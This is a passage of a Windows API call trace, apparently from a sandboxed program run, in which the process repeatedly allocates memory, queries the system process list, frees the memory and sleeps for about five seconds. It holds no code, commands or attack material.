BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.216] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.216] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.219] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.219] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.219] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.223] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.223] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.226] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.226] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.230] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.230] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.233] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.233] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.236] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.238] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.239] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.239] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.243] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.246] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.246] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.246] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.251] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.252] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.253] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.255] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.255] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.255] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.260] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.261] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.263] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.263] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.269] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.270] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.274] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.278] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.279] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.283] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.283] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.287] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.287] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.289] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.290] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.290] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.295] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.298] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.302] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.303] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.305] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.306] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.306] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.310] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.311] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.318] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.318] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.320] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.321] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.321] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.326] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.326] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.329] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.329] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.330] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.333] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.334] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.336] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.336] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.337] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.337] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.350] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.351] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.353] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.353] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.354] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.354] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.354] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.359] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.360] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.362] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.363] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.363] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.363] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.367] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.368] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.370] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.371] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.375] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.375] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.377] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0245.377] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0245.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0245.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0245.384] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0245.385] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0245.387] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0245.387] NtQuerySystemInformation (in: 